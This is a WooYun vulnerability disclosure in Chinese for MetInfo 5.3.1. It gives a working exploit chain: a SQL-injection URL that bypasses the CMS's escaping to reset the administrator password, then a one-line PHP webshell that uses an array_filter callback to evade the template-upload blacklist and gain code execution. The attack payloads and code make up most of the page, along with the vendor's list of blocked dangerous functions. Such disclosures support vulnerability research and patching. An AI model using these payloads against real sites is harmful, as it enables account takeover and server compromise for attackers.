当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134479

漏洞标题:metinfo 5.3.1 注入漏洞(无视全局防御)+后台getshell

相关厂商:MetInfo

漏洞作者: 淡蓝色の忧伤

提交时间:2015-08-17 10:55

修复时间:2015-11-15 11:24

公开时间:2015-11-15 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向第三方安全合作伙伴开放
2015-10-11: 细节向核心白帽子及相关领域专家公开
2015-10-21: 细节向普通白帽子公开
2015-10-31: 细节向实习白帽子公开
2015-11-15: 细节向公众公开

简要描述:

发后台getshell,审核不给过,说要后台权限,那我就给你后台权限O(∩_∩)O哈

详细说明:

注入触发点
/admin/include/global.func.php 1456行save_met_cookie函数

function save_met_cookie(){
global $met_cookie,$db,$met_admin_table;
$met_cookie['time']=time();
$json=json_encode($met_cookie);
$username=$met_cookie[metinfo_admin_id]?$met_cookie[metinfo_admin_id]:$met_cookie[metinfo_member_id];
$username=daddslashes($username,0,1);
$query="update $met_admin_table set cookie='$json' where id='$username'";
$user=$db->query($query);
}


$json=json_encode($met_cookie); 将$met_cookie转为json格式,存入数据库;
这里说明一下,json_encode 会吃掉转移符\,当我们引入单引号的时候 json 吃掉了 单引号的转译符\ ,所以在进入SQL语句的时候我们能保留 单引号 ',有了单引号一切就好办了。而且这个语句处理的是 met_admin_table 表,是管理员表。
我们看看$met_cookie
metinfo 采用伪全局变量机制
在/admin/include/common.inc.php 第76行

$met_cookie_filter=$met_cookie;
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value,0,0,1);
$_M['form'][$_key]=daddslashes($_value,0,0,1);
}
}
$met_cookie=array();
$met_cookie=$met_cookie_filter;
$settings=array();
$db_settings=array();
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php');
@extract($db_settings);


这里对$met_cookie 的处理,真是笑死了,只需要对$met_cookie_filter进行赋值还是能影响$met_cookie

我们看看daddslashes函数怎么处理的
/admin/include/global.func.php 注意是后台,前台也有个daddslashes函数但是代码不一样

function daddslashes($string, $force = 0 ,$sql_injection =0,$url =0){
!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
if(!MAGIC_QUOTES_GPC || $force) {
if(is_array($string)) {
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
} else {
$string = addslashes($string);
}
}
if(is_array($string)){
if($url){
//$string='';
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
}else{
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
}
}else{
if(SQL_DETECT!=1 || $sql_injection==1){
$string = str_ireplace("\"","/",$string);
$string = str_ireplace("'","/",$string);
$string = str_ireplace("*","/",$string);
$string = str_ireplace("~","/",$string);
$url = str_ireplace("\"","/",$url);
$url = str_ireplace("'","/",$url);
$url = str_ireplace("*","/",$url);
$url = str_ireplace("~","/",$url);
$string = str_ireplace("select", "\sel\ect", $string);
$string = str_ireplace("insert", "\ins\ert", $string);
$string = str_ireplace("update", "\up\date", $string);
$string = str_ireplace("delete", "\de\lete", $string);
$string = str_ireplace("union", "\un\ion", $string);
$string = str_ireplace("into", "\in\to", $string);
$string = str_ireplace("load_file", "\load\_\file", $string);
$string = str_ireplace("outfile", "\out\file", $string);
$string = str_ireplace("sleep", "\sle\ep", $string);
$string = str_ireplace("where", "\where", $string);
$string_html=$string;
$string = strip_tags($string);
if($string_html!=$string){
$string='';
}
$string = str_replace("%", "\%", $string); //
}
}
return $string;
}


(SQL_DETECT!=1 || $sql_injection==1)当满足这个条件时才过滤关键字,否则只是用addslashes处理, sql_injection默认为 0 ,我们找 SQL_DETECT
在admin/login/login.check.php
第9行 定义了define('SQL_DETECT',1);

if($depth!=''&&$depth!='../'&&$depth!='../../'){die();}
if(!isset($depth))$depth='';
$commonpath=$depth.'include/common.inc.php';
$commonpath=$admin_index?$commonpath:'../'.$commonpath;
define('SQL_DETECT',1);
require_once $commonpath;


所以只要在这里引入的变量都只是使用addslashes 处理
而save_met_cookie函数又能得到单引号,我们这样就绕过了metinfo的防御了。
现在找一下漏洞触发点
从上面的代码可以看到 在admin/login/login.check.php 中引入
admin/include/common.inc.php
而在 admin/include/common.inc.php文件的最后引入了
metlist.php
在metlist.php 第91行左右

if(!$shortcut_list){
$shortcut_list[0]=array('name'=>'lang_skinbaseset','url'=>'system/basic.php?anyid=9&lang=cn','bigclass'=>'1','field'=>'s1001','type'=>'2','list_order'=>'10','protect'=>'1','hidden'=>'0');
$shortcut_list[1]=array('name'=>'lang_indexcolumn','url'=>'column/index.php?anyid=25&lang=cn','bigclass'=>'1','field'=>'s1201','type'=>'2','list_order'=>'0','protect'=>'1','hidden'=>'0');
$shortcut_list[2]=array('name'=>'lang_unitytxt_75','url'=>'interface/skin_editor.php?anyid=18&lang=cn','bigclass'=>'1','field'=>'s1101','type'=>'2','list_order'=>'0','protect'=>'1','hidden'=>'0');
$shortcut_list[3]=array('name'=>'lang_tmptips','url'=>"interface/info.php?anyid=24&lang=cn",'bigclass'=>'1','field'=>'s1101','type'=>'2','list_order'=>'0','protect'=>'1','hidden'=>'0');
change_met_cookie('metinfo_admin_shortcut',$shortcut_list);
save_met_cookie();
$query="update $met_admin_table set admin_shortcut='".json_encode($shortcut_list)."' where admin_id='$metinfo_admin_name'";
$db->query($query);
}


我们看到调用了 save_met_cookie()函数;

漏洞证明:

因为没有回显,就把$query 输出好证明。
因为save_met_cookie函数中的数据表是管理员表,我们可以直接把管理员密码改了
O(∩_∩)O哈哈~
访问
/admin/login/login_check.php?met_cookie_filter[a]=a%27,admin_pass=md5(1234567)+where+id=1;+%23--

metinfo注入.png


这样就可以吧管理员密码改为12345678
当然利用不止这些(⊙o⊙)哦,毕竟我们已经绕过了防御。
现在后台getshell
getshel admin\include\uploadify.php 206行

elseif($type=='skin'){
/*模板文件*/
$filetype=explode('.',$_FILES['Filedata']['name']);
if($filetype[count($filetype)-1]=='zip'){
if(stristr($met_file_format,'zip') === false){
echo $lang_jsx36;
die();
}
//if(!is_writable('../../templates/'))@chmod('../../templates/',0777);
$filenamearray=explode('.zip',$_FILES['Filedata']['name']);
$skin_if=$db->get_one("SELECT * FROM {$met_skin_table} WHERE skin_file='{$filenamearray[0]}'");
if($skin_if){
$metinfo=$lang_loginSkin;
}else{
$f = new upfile('zip','../../templates/','','');
if($f->get_error()){
echo $f->get_errorcode();
die();
}
if(file_exists('../../templates/'.$filenamearray[0].'.zip'))$filenamearray[0]='metinfo'.$filenamearray[0];
$met_upsql = $f->upload('Filedata',$filenamearray[0]);
include "pclzip.lib.php";
$archive = new PclZip('../../templates/'.$filenamearray[0].'.zip');
if($archive->extract(PCLZIP_OPT_PATH, '../../templates/') == 0)$metinfo=$archive->errorInfo(true);
$list = $archive->listContent();
$error=0;
foreach($list as $key=>$val){
if(preg_match("/\.(asp|aspx|jsp)/i",$val[filename])){
$error=1;
}
if(!is_dir('../../templates/'.$val[filename])&&preg_match("/\.(php)/i",$val[filename])){
$danger=explode('|','preg_replace|assert|dirname|file_exists|file_get_contents|file_put_contents|fopen|mkdir|unlink|readfile|eval|cmd|passthru|system|gzuncompress|exec|shell_exec|fsockopen|pfsockopen|proc_open|scandir');
$ban='preg_replace|assert|eval|\$_POST|\$_GET';
foreach($danger as $key1 => $val1){
$str=file_get_contents('../../templates/'.$val[filename]);
$str=str_replace(array('\'','"','.'),'',$str);
if(preg_match("/([^A-Za-z0-9_]$val1)[\r\n\t]{0,}([\[\(])/i",$str)){
$error=1;
}
if(preg_match('/('.$ban.')/i',$str)){
$error=1;
}

}
}
}
@unlink('../../templates/'.$filenamearray[0].'.zip');
if($error){
foreach($list as $key=>$val){
if(is_dir('../../templates/'.$val[filename])){
@deldir('../../templates/'.$val[filename]);
}else{
@unlink('../../templates/'.$val[filename]);
}
}
$metinfo='含有危险函数,禁止上传!!';
}else{
$metinfo='1$'.$filenamearray[0];
}
}



上传.zip 文件会自动解压,不过有过滤,但是是 采用黑名单方式,用回调函数可以轻易绕过 如下面的一句话
<?php $e = $_REQUEST['e']; $arr = array($_REQUEST['pass'],); array_filter($arr, base64_decode($e)); ?>
接下来是利用 把上面的码写进test.php文件里压缩为test.zip格式 在后台找个能上传的的地方上传, 修改参数 type=skin 上传成功后在/templates目录下生成 test.php

修复方案:

看我写的怎么辛苦,求高rank,求 $$.

版权声明:转载请注明来源 淡蓝色の忧伤@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-17 11:23

厂商回复:

后续版本修复!感谢您的反馈!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-17 10:57 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    good

  2. 2015-08-17 11:04 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

  3. 2015-08-17 11:13 | 玉林嘎 ( 普通白帽子 | Rank:798 漏洞数:99 )

    nice

  4. 2015-08-17 14:28 | answer ( 普通白帽子 | Rank:367 漏洞数:47 | 答案)

    nice

  5. 2015-08-17 19:22 | menmen519 ( 普通白帽子 | Rank:764 漏洞数:147 | http://menmen519.blog.sohu.com/)

    为何这么屌

  6. 2015-08-17 20:09 | Manning ( 普通白帽子 | Rank:629 漏洞数:87 | https://github.com/manning23/MSpider)

    666

  7. 2015-08-20 14:53 | 乌云合作伙伴-绿盟(乌云厂商)

    我觉得这个洞价值$$$加闪电

  8. 2015-08-20 15:42 | menmen519 ( 普通白帽子 | Rank:764 漏洞数:147 | http://menmen519.blog.sohu.com/)

    @乌云合作伙伴-绿盟 这个估计比较难,后台你也得先找到 除非前台直接shell

  9. 2015-10-17 11:04 | mango ( 核心白帽子 | Rank:1721 漏洞数:255 | 我有个2b女友!)

    good